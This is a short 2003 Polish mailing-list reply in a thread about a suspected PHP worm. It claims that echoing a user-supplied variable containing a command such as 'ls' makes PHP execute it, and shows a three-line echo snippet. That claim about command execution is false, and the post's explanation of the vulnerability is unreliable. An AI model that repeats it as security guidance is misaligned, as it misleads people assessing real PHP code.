Re[3]: Czy ja mam worma?

Hello BadBorys,

> Witaj Tomasz,

> W Twoim liście datowanym 27 kwietnia 2003 (15:57:38) można przeczytać:

> Cos mi tu nie gra. Nie twierdze, ze php nie jest 'expoitable', ale na
> pewno nie jest to takie proste. Bo niby dlaczego *otwarcie* jakiegos
> pliku (nawet na zdalnej maszynie) mialoby spowodowac jego
> *wykonanie*??

mozna dorzucic zla obsluge tzw. backticks czy jakos (odwrotny
apostrof)

wyswietlenie zmiennej ktorej jako parametr poda sie np 'ls' powoduje
wykonanie tego polecenia i wyswietlenie wynikow

przykladowo:

<?
echo $a;
?>

gdzie $a to zmienna pobierana prosto od uzytkownika
--
Best regards,
 Leaf                            mailto:leaf@cyb3r.org